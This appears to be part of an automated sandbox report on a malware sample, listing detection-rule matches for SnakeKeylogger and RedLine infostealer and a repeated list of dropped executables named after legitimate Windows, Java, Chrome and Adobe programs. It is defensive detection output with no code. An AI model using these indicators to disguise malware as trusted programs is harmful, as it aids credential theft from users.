                  Source: 9.3.ymafvvdS.pif.24590000.925.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.1.ymafvvdS.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 9.3.ymafvvdS.pif.24742da8.17.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.1.ymafvvdS.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: ymafvvdS.pif PID: 7996, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: MavInject32.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: OfficeC2RClient.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3Help.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3_x64.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SciTE.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AdobeARMHelper.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jaureg.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jucheck.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jusched.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: officesvcmgr.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: chrome_pwa_launcher.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: chrmstp.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: setup.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: notification_helper.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: chrome_proxy.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: crashreporter.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: default-browser-agent.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: firefox.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: maintenanceservice.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: armsvc.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: alg.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleCrashHandler.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleCrashHandler64.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdate.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateBroker.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateComRegisterShell64.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateCore.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateOnDemand.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jabswitch.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVClient.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: DiagnosticsHub.StandardCollector.Service.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: FXSSVC.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: maintenanceservice.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java-rmi.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javacpl.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jjs.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jp2launcher.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: keytool.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: kinit.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: klist.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msdtc.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msiexec.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: PerceptionSimulationService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: perfhost.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Locator.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MsSense.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SensorDataService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: snmptrap.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ktab.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: orbd.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pack200.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: policytool.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmid.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmiregistry.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: servertool.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ssvagent.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: tnameserv.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: unpack200.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Spectrum.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ssh-agent.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: TieringEngineService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AgentService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: vds.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: VSSVC.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wbengine.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: WmiApSrv.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wmpnetwk.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ie_to_edge_stub.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: cookie_exporter.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: identity_helper.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: setup.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedgewebview2.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MavInject32.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: OfficeC2RClient.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3Help.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3_x64.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SciTE.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AdobeARMHelper.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jaureg.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jucheck.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jusched.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: officesvcmgr.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: chrome_pwa_launcher.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: chrmstp.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: setup.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
